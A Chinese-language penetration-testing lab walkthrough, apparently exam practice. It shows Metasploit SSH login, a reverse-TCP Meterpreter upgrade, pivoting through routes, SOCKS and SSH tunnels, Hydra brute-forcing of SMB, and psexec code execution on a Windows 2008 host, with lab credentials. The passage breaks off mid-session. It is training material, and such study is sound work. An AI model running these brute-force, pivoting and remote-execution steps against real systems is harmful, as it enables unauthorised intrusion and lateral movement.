在前一章節已爆破出.65.200的ssh帳密,所以用metaspolit建立連結:
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.65.200
rhosts => 172.16.65.200
msf6 auxiliary(scanner/ssh/ssh_login) > set username vagrant
username => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set password vagrant
password => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > run
[+] 172.16.65.200:22 - Success: 'vagrant:vagrant' 'uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner) Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux '
[*] Command shell session 1 opened (172.16.253.22:45413 -> 172.16.65.200:22) at 2023-04-19 08:06:35 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -;
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH vagrant:vagrant (172.16.65.200:22) 172.16.253.22:45413 -> 172.16.65.200:22 (172.16.65.200)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.253.22:4433
[*] Sending stage (980808 bytes) to 172.16.65.200
[*] Meterpreter session 2 opened (172.16.253.22:4433 -> 172.16.65.200:49150) at 2023-04-19 08:06:53 -0400
[*] Command stager progress: 100.00% (773/773 bytes)
因為知道是雙網卡,所以進入session加上那一張雙網卡:
msf6 auxiliary(server/socks_proxy) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > run autoroute -s 192.168.5.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.5.0/255.255.255.0...
[+] Added route to 192.168.5.0/255.255.255.0 via 172.16.65.200
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.5.0 255.255.255.0 Session 2
meterpreter > bg
[*] Backgrounding session 2...
還要再設定socks,才能達成目的:
msf6 auxiliary(scanner/ssh/ssh_login) > search socks
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/sockso_traversal 2012-03-14 normal No Sockso Music Host Server 1.5 Directory Traversal
1 auxiliary/server/socks_proxy normal No SOCKS Proxy Server
2 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/server/socks_unc
msf6 auxiliary(scanner/ssh/ssh_login) > use 1
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 8090 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > set srvhost 172.16.253.22
srvhost => 172.16.253.22
msf6 auxiliary(server/socks_proxy) > set srvport 9010
srvport => 9010
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 2.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root),147(kaboxer)
設定完socks後,還要調整設定檔:
┌──(root💀kali)-[~]
└─# vim /etc/proxychains4.conf 134 ⨯
MoTTY X11 proxy: Unsupported authorisation protocol
要修改的內容如下,記得最後一行的IP跟port取決於剛剛在msf時的設定:
MoTTY X11 proxy: Unsupported authorisation protocol
# proxychains.conf VER 4.x
#
# HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS.
# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
# strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#round_robin_chain
#
# Round Robin - Each connection will be done via chained proxies
# of chain_len length
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped).
# the start of the current proxy chain is the proxy after the last
# proxy in the previously invoked proxy chain.
# if the end of the proxy chain is reached while looking for proxies
# start at the beginning again.
# otherwise EINTR is returned to the app
# These semantics are not guaranteed in a multithreaded environment.
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)
# Make sense only if random_chain or round_robin_chain
#chain_len = 2
# Quiet mode (no output from library)
#quiet_mode
# Proxy DNS requests - no leak for DNS data
#proxy_dns
# set the class A subnet number to use for the internal remote DNS mapping
# we use the reserved 224.x.x.x range by default,
# if the proxified app does a DNS request, we will return an IP from that range.
# on further accesses to this ip we will send the saved DNS name to the proxy.
# in case some control-freak app checks the returned ip, and denies to
# connect, you can use another subnet, e.g. 10.x.x.x or 127.x.x.x.
# of course you should make sure that the proxified app does not need
# *real* access to this subnet.
# i.e. dont use the same subnet then in the localnet section
#remote_dns_subnet 127
#remote_dns_subnet 10
remote_dns_subnet 224
# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000
### Examples for localnet exclusion
## localnet ranges will *not* use a proxy to connect.
## Exclude connections to 192.168.1.0/24 with port 80
# localnet 192.168.1.0:80/255.255.255.0
## Exclude connections to 192.168.100.0/24
# localnet 192.168.100.0/255.255.255.0
# localnet 0.0.0.0:80/0.0.0.0
## RFC5735 Loopback address range
## if you enable this, you have to make sure remote_dns_subnet is not 127
## you'll need to enable it if you want to use an application that
## connects to localhost.
# localnet 127.0.0.0/255.0.0.0
## RFC1918 Private Address Ranges
# localnet 10.0.0.0/255.0.0.0
# localnet 172.16.0.0/255.240.0.0
# localnet 192.168.0.0/255.255.0.0
# ProxyList format
# type ip port [user pass]
# (values separated by 'tab' or 'blank')
#
# only numeric ipv4 addresses are valid
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 20000
socks5 127.0.0.1 8090
socks4 172.16.253.22 9010
用msf的portscan來掃掃看:
msf6 auxiliary(server/socks_proxy) > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/sap/sap_router_portscanner
msf6 auxiliary(server/socks_proxy) > use 5
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.5.0/24
rhosts => 192.168.5.0/24
msf6 auxiliary(scanner/portscan/tcp) > set ports 21,22,135,139,445,3389
ports => 21,22,135,139,445,3389
msf6 auxiliary(scanner/portscan/tcp) > run
[*] 192.168.5.0/24: - Scanned 26 of 256 hosts (10% complete)
[*] 192.168.5.0/24: - Scanned 52 of 256 hosts (20% complete)
[*] 192.168.5.0/24: - Scanned 77 of 256 hosts (30% complete)
[+] 192.168.5.100: - 192.168.5.100:135 - TCP OPEN
[+] 192.168.5.100: - 192.168.5.100:445 - TCP OPEN
[+] 192.168.5.100: - 192.168.5.100:139 - TCP OPEN
[*] 192.168.5.0/24: - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.5.0/24: - Scanned 128 of 256 hosts (50% complete)
[*] 192.168.5.0/24: - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.5.0/24: - Scanned 180 of 256 hosts (70% complete)
[+] 192.168.5.200: - 192.168.5.200:22 - TCP OPEN
[*] 192.168.5.0/24: - Scanned 205 of 256 hosts (80% complete)
[+] 192.168.5.230: - 192.168.5.230:22 - TCP OPEN
[*] 192.168.5.0/24: - Scanned 231 of 256 hosts (90% complete)
[*] 192.168.5.0/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > Interrupt: use the 'exit' command to quit
發現.5除了172.16.65.200本身所兼任的.5.200外,還有100跟230,先打100,總之先掃描:
┌──(root💀kali)-[~]
└─# proxychains nmap 192.168.5.100 -sT -Pn -sC -sV -p445,139,135 --disable-arp-ping
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-19 08:59 EDT
[proxychains] Dynamic chain ... 127.0.0.1:20000 ... timeout
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:139 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:139 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:139 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:46946 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:52338 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:1433 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 <--denied
Nmap scan report for 192.168.5.100
Host is up (0.0069s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7600 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h21m00s, deviation: 4h02m29s, median: 59s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::-
| Computer name: WIN-6HAVIPITA2C
| NetBIOS computer name: WIN-6HAVIPITA2C\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-04-19T06:00:59-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-19T13:01:00
|_ start_date: 2021-12-24T09:07:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.17 seconds
用hydra爆破smb密碼:
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# proxychains4 hydra -L ./Usernames-CPENT.txt -P ./Passwords-CPENT.txt 192.168.5.100 smb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-20 08:37:59
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1820 login tries (l:35/p:52), ~1820 tries per task
[DATA] attacking smb://192.168.5.100:445/
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[445][smb] host: 192.168.5.100 login: administrator password: Pa$$w0rd123
得知密碼後,再用smbclient揭露共享目錄:
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# proxychains4 smbclient -U administrator -L //192.168.5.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.200.7:4490 <--denied
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
Password for [WORKGROUP\administrator]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:139 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:139 <--socket error or timeout!
do_connect: Connection to 192.168.5.100 failed (Error NT_STATUS_CONNECTION_REFUSED)
Unable to connect with SMB1 -- no workgroup available
接下來是連接,原本想說連接後再用reverse shell,但感覺太複雜了。
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# proxychains4 smbclient -U administrator //192.168.5.100/ADMIN$
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Password for [WORKGROUP\administrator]:
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.200.7:4490 <--denied
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
Try "help" to get a list of possible commands.
smb: \>
所以改用crackmapexec,可以直接在-x參數後面加上cmd的指令,做到類似get shell的效果:
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# proxychains4 crackmapexec smb -d . -u administrator -p 'Pa$$w0rd123' -x "ipconfig" 192.168.5.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.200.7:4490 <--denied
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:135 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [*] Windows Server 2008 R2 Standard 7600 x64 (name:WIN-6HAVIPITA2C) (domain:.) (signing:False) (SMBv1:True)
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [+] .\administrator:Pa$$w0rd123 (Pwn3d!)
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:49155 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [+] Executed command
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Windows IP Configuration
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Ethernet adapter Local Area Connection 2:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Connection-specific DNS Suffix . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Link-local IPv6 Address . . . . . : fe80::2926:9c59:1583:49cd%13
SMB 192.168.5.100 445 WIN-6HAVIPITA2C IPv4 Address. . . . . . . . . . . : 192.168.35.3
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Subnet Mask . . . . . . . . . . . : 255.255.255.0
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Default Gateway . . . . . . . . . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Ethernet adapter Local Area Connection:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Connection-specific DNS Suffix . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Link-local IPv6 Address . . . . . : fe80::706d:5375:36e7:25d5%11
SMB 192.168.5.100 445 WIN-6HAVIPITA2C IPv4 Address. . . . . . . . . . . : 192.168.5.100
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Subnet Mask . . . . . . . . . . . : 255.255.255.0
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Default Gateway . . . . . . . . . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Tunnel adapter isatap.{6795DF19-8582-485B-B917-6024E8923394}:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Media State . . . . . . . . . . . : Media disconnected
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Connection-specific DNS Suffix . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Tunnel adapter isatap.{63F291AA-9F1A-4125-B2E9-2CB8EE4E857A}:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Media State . . . . . . . . . . . : Media disconnected
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Connection-specific DNS Suffix . :
由上指令ipconfig可知.5.100其實也是雙網卡,身兼.35網段,本身也有.35.3 IP。
所以接下來用metaspolit跟.5.100連線:
msf6 exploit(windows/smb/psexec) > use use exploit/windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/psexec
[*] Using exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.5.100
rhosts => 192.168.5.100
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass Pa$$w0rd123
smbpass => Pa$$w0rd123
msf6 exploit(windows/smb/psexec) > set smbshare C$
smbshare => C$
msf6 exploit(windows/smb/psexec) > set lport 4460
lport => 4460
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.5.100 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass Pa$$w0rd123 no The password for the specified username
SMBSHARE C$ no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser administrator no The username to authenticate as
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4460 yes The listen port
RHOST 192.168.5.100 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.5.100:445 - Connecting to the server...
[*] 192.168.5.100:445 - Authenticating to 192.168.5.100:445 as user 'administrator'...
[*] 192.168.5.100:445 - Selecting PowerShell target
[*] 192.168.5.100:445 - Executing the payload...
[+] 192.168.5.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.5.100:4460
[*] Sending stage (175686 bytes) to 192.168.5.100
[*] Meterpreter session 3 opened (192.168.5.200:57426 -> 192.168.5.100:4460 via session 2) at 2023-04-21 11:53:32 -0400
meterpreter > sysinfo
Computer : WIN-6HAVIPITA2C
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(windows/smb/psexec) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.200.6:44393 -> 172.16.65.200:22 (172.16.65.200)
2 meterpreter x86/linux vagrant @ 172.16.65.200 192.168.200.6:4433 -> 172.16.65.200:52490 (172.16.65.200)
3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN-6HAVIPITA2C 192.168.5.200:57426 -> 192.168.5.100:4460 via session 2 (192.168.5.100)
另一個可以摸到.5.100的方法:
要先登入.65.200,並下ssh -D 127.0.0.1:9052 vagrant@127.0.0.1指令
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# ssh vagrant@172.16.65.200
vagrant@172.16.65.200's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 1 05:01:07 2023 from 192.168.200.9
vagrant@debian-9:~$ ssh -D 127.0.0.1:9052 vagrant@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:N2bWq7onBisA2zJvpcq2tFfhKJTWX5iPE8NHCSsE/uk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
vagrant@127.0.0.1's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 1 05:14:23 2023 from 192.168.200.6
接下來是ssh -R 127.0.0.1:9051:127.0.0.1:9052 kali@192.168.200.6指令,記得要修改*/etc/proxychains4.conf最下面,改成socks4 127.0.0.1 9051。
vagrant@debian-9:~$ ssh -R 127.0.0.1:9051:127.0.0.1:9052 kali@192.168.200.6
The authenticity of host '192.168.200.6 (192.168.200.6)' can't be established.
ECDSA key fingerprint is SHA256:Qrsxh/VOOuYPH6Lk5h3T8TuOEEs544mmxniMPJ4wflc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.200.6' (ECDSA) to the list of known hosts.
kali@192.168.200.6's password:
Linux kali 6.1.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.20-2kali1 (2023-0 4-18) x86_64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 1 03:06:12 2023 from 192.168.18.173
┌──(kali㉿kali)-[~]
└─$ sudo -i
成功可以nmap掃.5.100
┌──(root㉿kali)-[~]
└─# proxychains nmap -Pn -sT -n -p135,139,445 192.168.5.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 08:41 EDT
[proxychains] Dynamic chain ... 127.0.0.1:9051 ... 192.168.5.100:135 ... O K
[proxychains] Dynamic chain ... 127.0.0.1:9051 ... 192.168.5.100:139 ... O K
[proxychains] Dynamic chain ... 127.0.0.1:9051 ... 192.168.5.100:445 ... O K
Nmap scan report for 192.168.5.100
Host is up (0.092s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
也可以掃192.168.5.230:
┌──(root㉿kali)-[~]
└─# proxychains nmap -Pn -n -sT -p22 192.168.5.230
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 08:56 EDT
[proxychains] Dynamic chain ... 127.0.0.1:9051 ... 192.168.5.230:22 ... OK
Nmap scan report for 192.168.5.230
Host is up (0.037s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
6.Challenge 45: (50 Points)
What are the last 6 characters of the ssh ECDSA private key on the 192.168.5.230 machine?
因為.5.230只有ssh port,所以是爆破,但字典檔好像不含帳密的樣子。
Double pivoting
進入了上面新建的session後如法炮製,就可以建立double pivoting。為了仔細,以下從.65.200開始,仔細說明從pivot一路建立到double pivoting的步驟。
首先攻擊機一開始就能摸到的是172.16.65.200,65.200具備.5.200雙網卡,所以要先對它建立session,並加入.5網段到路由:
msf6 > use scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.65.200
rhosts => 172.16.65.200
msf6 auxiliary(scanner/ssh/ssh_login) > set username vagrant
username => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set password vagrant
password => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.65.200:22 - Starting bruteforce
[+] 172.16.65.200:22 - Success: 'vagrant:vagrant' 'uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner) Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux '
[*] SSH session 1 opened (192.168.200.6:34219 -> 172.16.65.200:22) at 2023-05-11 21:51:35 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
